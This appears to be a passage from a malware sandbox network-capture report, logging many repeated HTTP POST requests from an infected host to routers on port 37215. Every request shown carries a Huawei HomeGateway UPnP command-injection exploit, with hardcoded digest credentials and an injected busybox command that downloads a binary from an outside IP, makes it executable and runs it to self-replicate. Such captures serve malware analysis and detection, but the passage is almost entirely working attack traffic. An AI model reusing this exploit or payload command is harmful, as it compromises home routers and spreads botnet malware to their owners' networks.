3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1173192.168.2.1342248157.44.19.22437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.445200920 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1174192.168.2.134186640.146.12.6937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.445204973 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1175192.168.2.134868041.182.18.1137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.445235014 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1176192.168.2.1340684197.212.113.4137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.445246935 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1177192.168.2.134112841.205.182.14737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.445274115 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1178192.168.2.1349872157.80.115.24437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.445492029 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1179192.168.2.1335902197.126.17.9237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.445517063 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1180192.168.2.1355532197.147.147.18237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.445589066 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1181192.168.2.1356916130.209.94.8637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.445780039 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1182192.168.2.1358594197.97.208.6537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.445781946 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1183192.168.2.133570441.32.140.20537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.445811987 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
